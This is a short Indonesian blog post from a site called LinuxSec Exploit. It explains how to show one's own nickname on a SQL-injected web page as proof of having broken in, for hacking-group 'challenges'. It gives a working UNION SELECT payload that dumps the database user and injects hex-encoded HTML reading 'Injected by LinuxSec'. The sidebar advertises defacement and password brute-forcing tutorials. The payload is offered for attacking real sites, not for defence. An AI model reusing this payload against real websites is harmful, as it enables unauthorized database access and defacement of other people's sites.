• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Menampilkan Nama Kita pada Halaman SQL Injection

August 5, 2017 by Jack Wilder Leave a Comment

Menampilkan Nama Kita pada Halaman SQL Injection. Di beberapa challenge di grup, ada kalanya kita diharuskan menampilkan nick kita pada halaman yang diinject sebagai bukti bahwa kita benar benar orang yang menginject halaman tersebut. Dan sebenarnya caranya cukup mudah. Saya malah heran beberapa waktu lalu masih ada yang nanya ke saya bagaimana cara menampilkan nama kita pada halaman output SQl Injection.

Padahal, jika kalian sudah membaca artikel saya tentang SQL Injection manual, harusnya kalian sudah paham. caranya cukup mudah, yakni hanya mengconvert text yang ingin diprint atau ditampilkan he bentuk hex. Sebagai contoh, saya ingin menampilkan username database beserta output “Injected by LinuxSec”, maka querynya adalah

1337' union select 1,2,group_concat(user(),0x3c62723e3c68313e496e6a6563746564206279204c696e75785365633c2f68313e),4,5#

3c62723e3c68313e496e6a6563746564206279204c696e75785365633c2f68313e adalah bentuk hex dari <br><h1>Injected by LinuxSec</h1>.

Hasilnya:

Mudah bukan?

Baiklah sekian tutorial kali ini, semoga bermanfaat. Jika ada yang kurang jelas silahkan ditanyakan.

Shares

Filed Under: SQL Injection

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

Cracking FTP Password using Hydra on BackBox Linux

Cara Mendapatkan RDP Gratis Dengan Shell Windows

Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Azure Traffic Manager Custom Domain or Subdomain Takeover

Command Injection Bypass Cheatsheet

Bruteforce FTP Login dengan Metasploit Module FTP Authentication Scanner

Deteksi Celah No Redirect pada Suatu Situs menggunakan cURL

Tool Deface Opencart Bruteforce and Upload Image

CVE-2019-13360 – CentOS Control Web Panel Authentication Bypass

Powered by WordPress and Genesis Framework. Style by LinuxSec.